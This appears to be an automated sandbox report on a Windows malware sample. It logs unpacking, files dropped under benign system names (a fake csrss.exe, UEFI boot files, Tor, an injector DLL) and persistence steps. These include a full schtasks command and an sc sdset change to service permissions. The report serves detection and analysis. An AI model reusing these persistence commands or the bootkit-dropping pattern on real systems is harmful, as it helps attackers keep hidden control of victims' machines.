        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Transactions.ni.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: C:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: System.Numerics.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Core.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeUnpacked PE file: 4.2.kdsyitkxmS.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeUnpacked PE file: 10.2.kdsyitkxmS.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeUnpacked PE file: 20.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeUnpacked PE file: 23.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeUnpacked PE file: 31.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeUnpacked PE file: 40.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeUnpacked PE file: 43.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeUnpacked PE file: 50.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeUnpacked PE file: 55.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeUnpacked PE file: 58.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeUnpacked PE file: 61.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exeCode function: 20_3_0C4841B0 push eax; retf
        Source: C:\Windows\rss\csrss.exeCode function: 20_3_0C4841B0 push eax; retf
        Source: injector.exe.20.drStatic PE information: section name: _RDATA
        Source: NtQuerySystemInformationHook.dll.20.drStatic PE information: section name: _RDATA
        Source: zlib1.dll.20.drStatic PE information: section name: /4
        Source: tor.exe.20.drStatic PE information: section name: /4
        Source: tor-gencert.exe.20.drStatic PE information: section name: /4
        Source: libwinpthread-1.dll.20.drStatic PE information: section name: /4
        Source: libwinpthread-1.dll.20.drStatic PE information: section name: /14
        Source: libwinpthread-1.dll.20.drStatic PE information: section name: /29
        Source: libwinpthread-1.dll.20.drStatic PE information: section name: /41
        Source: libwinpthread-1.dll.20.drStatic PE information: section name: /55
        Source: libwinpthread-1.dll.20.drStatic PE information: section name: /67
        Source: libwinpthread-1.dll.20.drStatic PE information: section name: /78
        Source: libwinpthread-1.dll.20.drStatic PE information: section name: /89
        Source: libssp-0.dll.20.drStatic PE information: section name: /4
        Source: libssp-0.dll.20.drStatic PE information: section name: /14
        Source: libssp-0.dll.20.drStatic PE information: section name: /29
        Source: libssp-0.dll.20.drStatic PE information: section name: /41
        Source: libssp-0.dll.20.drStatic PE information: section name: /55
        Source: libssp-0.dll.20.drStatic PE information: section name: /67
        Source: libssp-0.dll.20.drStatic PE information: section name: /80
        Source: libssp-0.dll.20.drStatic PE information: section name: /91
        Source: libssp-0.dll.20.drStatic PE information: section name: /102
        Source: libssl-1_1.dll.20.drStatic PE information: section name: /4
        Source: libssl-1_1.dll.20.drStatic PE information: section name: /14
        Source: libssl-1_1.dll.20.drStatic PE information: section name: /29
        Source: libssl-1_1.dll.20.drStatic PE information: section name: /41
        Source: libssl-1_1.dll.20.drStatic PE information: section name: /55
        Source: libssl-1_1.dll.20.drStatic PE information: section name: /67
        Source: libssl-1_1.dll.20.drStatic PE information: section name: /80
        Source: libssl-1_1.dll.20.drStatic PE information: section name: /91
        Source: libssl-1_1.dll.20.drStatic PE information: section name: /102
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: section name: /4
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: section name: /14
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: section name: /29
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: section name: /41
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: section name: /55
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: section name: /67
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: section name: /80
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: section name: /91
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: section name: /102
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: section name: /4
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: section name: /14
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: section name: /29
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: section name: /41
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: section name: /55
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: section name: /67
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: section name: /80
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: section name: /91
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: section name: /102
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: section name: /4
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: section name: /14
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: section name: /29
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: section name: /41
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: section name: /55
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: section name: /67
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: section name: /80
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: section name: /91
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: section name: /102
        Source: libevent-2-1-7.dll.20.drStatic PE information: section name: /4
        Source: libevent-2-1-7.dll.20.drStatic PE information: section name: /14
        Source: libevent-2-1-7.dll.20.drStatic PE information: section name: /29
        Source: libevent-2-1-7.dll.20.drStatic PE information: section name: /41
        Source: libevent-2-1-7.dll.20.drStatic PE information: section name: /55
        Source: libevent-2-1-7.dll.20.drStatic PE information: section name: /67
        Source: libevent-2-1-7.dll.20.drStatic PE information: section name: /80
        Source: libevent-2-1-7.dll.20.drStatic PE information: section name: /91
        Source: libevent-2-1-7.dll.20.drStatic PE information: section name: /102
        Source: libcrypto-1_1.dll.20.drStatic PE information: section name: /4
        Source: libcrypto-1_1.dll.20.drStatic PE information: section name: /14
        Source: libcrypto-1_1.dll.20.drStatic PE information: section name: /29
        Source: libcrypto-1_1.dll.20.drStatic PE information: section name: /41
        Source: libcrypto-1_1.dll.20.drStatic PE information: section name: /55
        Source: libcrypto-1_1.dll.20.drStatic PE information: section name: /67
        Source: libcrypto-1_1.dll.20.drStatic PE information: section name: /80
        Source: libcrypto-1_1.dll.20.drStatic PE information: section name: /91
        Source: libcrypto-1_1.dll.20.drStatic PE information: section name: /102
        Source: proxy.exe.20.drStatic PE information: section name: .symtab
        Source: bootmgfw.efi.20.drStatic PE information: section name: .xdata
        Source: bootx64.efi.20.drStatic PE information: section name: .xdata
        Source: EfiGuardDxe.efi.20.drStatic PE information: section name: .xdata
        Source: bootx64.efi.20.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
        Source: NtQuerySystemInformationHook.dll.20.drStatic PE information: real checksum: 0x0 should be: 0x2279d
        Source: csrss.exe.10.drStatic PE information: real checksum: 0x435435 should be: 0x4373eb
        Source: bootmgfw.efi.20.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
        Source: EfiGuardDxe.efi.20.drStatic PE information: real checksum: 0x4a5a6 should be: 0x51a75
        Source: proxy.exe.20.drStatic PE information: real checksum: 0x0 should be: 0x70e262
        Source: kdsyitkxmS.exeStatic PE information: real checksum: 0x435435 should be: 0x4373eb
        Source: injector.exe.20.drStatic PE information: real checksum: 0x0 should be: 0x54ea2

        Persistence and Installation Behavior

        barindex
        Creates files in the system32 config directory
        Source: C:\Windows\System32\netsh.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepubJump to behavior
        Drops executables to the windows directory (C:\Windows) and starts them
        Source: C:\Windows\System32\fodhelper.exeExecutable created and started: C:\Windows\rss\csrss.exe
        Drops PE files with benign system names
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Boot\old.efi (copy)Jump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dllJump to dropped file
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libgcc_s_dw2-1.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\zlib1.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libwinpthread-1.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file

        Boot Survival

        barindex
        Creates an autostart registry key pointing to binary in C:\Windows
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
